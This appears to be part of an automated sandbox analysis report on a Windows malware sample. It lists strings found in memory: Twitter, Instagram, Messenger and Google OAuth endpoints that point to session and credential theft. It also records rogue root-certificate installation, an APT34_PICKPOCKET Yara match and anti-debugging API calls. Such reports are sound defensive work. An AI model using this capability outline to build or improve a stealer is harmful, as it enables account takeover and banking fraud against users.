Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://mail.google.com/mail/#settings
Source: ecvB803.tmp.11.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: ecvB803.tmp.11.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.0/west-european/default/mwf-main.min.css
Source: ecvB803.tmp.11.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/js/bundle/1.57.0/mwf-auto-init-main.var.min.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-22-21-45-19/PreSignInSettingsConfig.json
Source: ecvB803.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2020-07-24-17-35-16/PreSignInSettingsConfig.json?One
Source: ecvB803.tmp.11.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.124.0621.0006/update10.xml?OneDriveUpdate=79d8737dc86cbccc6833c
Source: ecvB803.tmp.11.drString found in binary or memory: https://onecs-live.azureedge.net/api/settings/en-US/xml/settings-tipset?release=rs4
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://payments.google.com/
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.jstW2
Source: ecvB803.tmp.11.drString found in binary or memory: https://pki.goog/repository/0
Source: ecvB803.tmp.11.drString found in binary or memory: https://prod-video-cms-rt-microsoft-com.akamaized.net/vhs/api/videos/RE4sQBc
Source: ecvB803.tmp.11.drString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://sandbox.google.com/
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://sandbox.google.com/payments/v4/js/integr
Source: 63C4F3D9EA0CC861.exeString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.jsuSS4
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ecvB803.tmp.11.drString found in binary or memory: https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn
Source: ecvB803.tmp.11.drString found in binary or memory: https://statics-marketingsites-neu-ms-com.akamaized.net/statics/override.css?c=7
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284546923.0000000003F0F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_divx
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284617866.0000000003F9F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284658762.0000000003F02000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284658762.0000000003F02000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284617866.0000000003F9F000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/compose/tweetsec-fetch-dest:
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/compose/tweetsec-fetch-mode:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/ookie:
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.comReferer:
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://twitter.comsec-fetch-dest:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json%dcommand=INIT&total_bytes=&media_type=image%2Fjpeg&me
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://upload.twitter.com/i/media/upload.jsoncommand=FINALIZE&media_id=
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp, ecvB803.tmp.11.drString found in binary or memory: https://www.digicert.com/CPS0
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google-analytics.com/analytics.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google-analytics.com/gtm/js?id=GTM-N7S69J3&cid=485847574.1601477586
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262299790.0000000003F62000.00000004.00000001.sdmp, ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/7
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/application/x-msdownloadC:
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/css/main.v3.min.css
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome-logo.svg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_safari-behavior.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/chrome_throbber_fast.gif
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_phone.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/download-browser/pixel_tablet.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/google-logo-one-color.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-description-white-blue-bg.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-fb.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-file-download.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-help.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-twitter.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/fallback/icon-youtube.jpg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/folder-applications.svg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-beta.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-canary.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-dev.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/google-enterprise.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-middle.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/hero-anim-top-right.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_features.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_privacy.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/homepage_tools.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/homepage/laptop_desktop.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-announcement.svg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/icon-file-download.svg
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/mac-ico.png
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/js/installer.min.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/static/js/main.v2.min.js
Source: ecvB803.tmp.11.drString found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000003.262688251.0000000003F57000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/cloudprint
Source: 63C4F3D9EA0CC861.exe | String found in binary or memory: https://www.google.com/cloudprint/enab
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262688251.0000000003F57000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connector
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com/cloudprint/enable_chrome_connectorHN
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp | String found in binary or memory: https://www.google.com;
Source: ecvB803.tmp.11.dr | String found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
Source: ecvB803.tmp.11.dr | String found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
Source: ecvB803.tmp.11.dr | String found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
Source: 63C4F3D9EA0CC861.exe | String found in binary or memory: https://www.googleapis.com/
Source: 63C4F3D9EA0CC861.exe | String found in binary or memory: https://www.googleapis.com/auth/calend
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp | String found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp | String found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262789067.0000000003F2E000.00000004.00000001.sdmp | String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: 63C4F3D9EA0CC861.exe | String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp | String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyourc
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp | String found in binary or memory: https://www.googleapis.com/auth/chromewebstoreU
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp | String found in binary or memory: https://www.googleapis.com/auth/chromewebstoreh
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp | String found in binary or memory: https://www.googleapis.com/auth/clouddevices
Source: 63C4F3D9EA0CC861.exe | String found in binary or memory: https://www.googleapis.com/auth/h
Source: 63C4F3D9EA0CC861.exe | String found in binary or memory: https://www.googleapis.com/auth/hangouts
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp | String found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp | String found in binary or memory: https://www.googleapis.com/auth/hangoutsrx
Source: 63C4F3D9EA0CC861.exe | String found in binary or memory: https://www.googleapis.com/auth/meetings
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp | String found in binary or memory: https://www.googleapis.com/auth/meetingsrx
Source: 63C4F3D9EA0CC861.exe | String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwri
Source: 63C4F3D9EA0CC861.exe | String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp | String found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwriteu
Source: 63C4F3D9EA0CC861.exe | String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp | String found in binary or memory: https://www.googleapis.com/auth/sierraM
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp | String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000003.262789067.0000000003F2E000.00000004.00000001.sdmp | String found in binary or memory: https://www.googleapis.com/auth/userinfo.email
Source: ecvB803.tmp.11.dr | String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-26908291-4
Source: ecvB803.tmp.11.dr | String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: ecvB803.tmp.11.dr | String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: ecvB803.tmp.11.dr | String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: ecvB803.tmp.11.dr | String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: ecvB803.tmp.11.dr | String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: ecvB803.tmp.11.dr | String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp | String found in binary or memory: https://www.gstatic.com;
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.instagram.com/
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.instagram.com/accept:
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.messenger.com
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.messenger.com/
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.messenger.com/accept:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.messenger.com/login/nonce/
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.messenger.com/origin:
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:
Source: C:\Users\user\AppData\Roaming\1612045890161.exe | Code function: 11_2_0040AE4D OpenClipboard

E-Banking Fraud:

Registers a new ROOT certificate
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext

System Summary:

Malicious sample detected (through community Yara rule)
Source: 4.2.63C4F3D9EA0CC861.exe.3280000.6.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Author: unknown
Source: 3.2.63C4F3D9EA0CC861.exe.3380000.5.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Author: unknown
PE file has a writeable .text section
Source: fnhcdXEfus.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 63C4F3D9EA0CC861.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019D40 LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019F00 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019F50 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10019FA0 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess
Source: C:\Users\user\AppData\Roaming\1612045890161.exe | Code function: 11_2_0040C516 NtQuerySystemInformation
Source: C:\Users\user\AppData\Roaming\1612045890161.exe | Code function: 11_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1001D560: wsprintfW,CreateFileW,_memset,DeviceIoControl,FindCloseChangeNotification
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0045895B GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00445630
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0045015C
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_004506CC
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00450C3C
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00409140
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00409580
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00445612
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00445620
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_004456C3
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00409870
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00461A30
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00451A3C
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00445BD3
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0044E1E6
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_004521B8
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00422751
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00406A40
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0043ACD1
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0044AD9A
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00407162
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_004073B5
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0044B6B4
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_100071F0
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10009257
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1000B3B0
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1000B883
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_100099E0
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1000BC57
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1000FF71
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1000C063
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_100060F0
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10008340
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1000E380
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_100083F0
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1000C483
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10010590
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_100169BD
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_10010AED
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1000ABA0
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1001EBD0
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1001EDDB
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1000C063
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1000B883
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_100060F0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_100169BD
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_100099E0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_100071F0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10009257
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10010AED
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10008340
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1000E380
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1000ABA0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1000B3B0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1001EBD0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_100083F0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1000BC57
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1000C483
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10010590
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1001EDDB
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1000FF71
Source: C:\Users\user\AppData\Roaming\1612045890161.exe | Code function: 11_2_00404BE4
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 30_2_002B963B
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 30_2_002B6A1E
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 30_2_002BA0C3
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 30_2_002BB51C
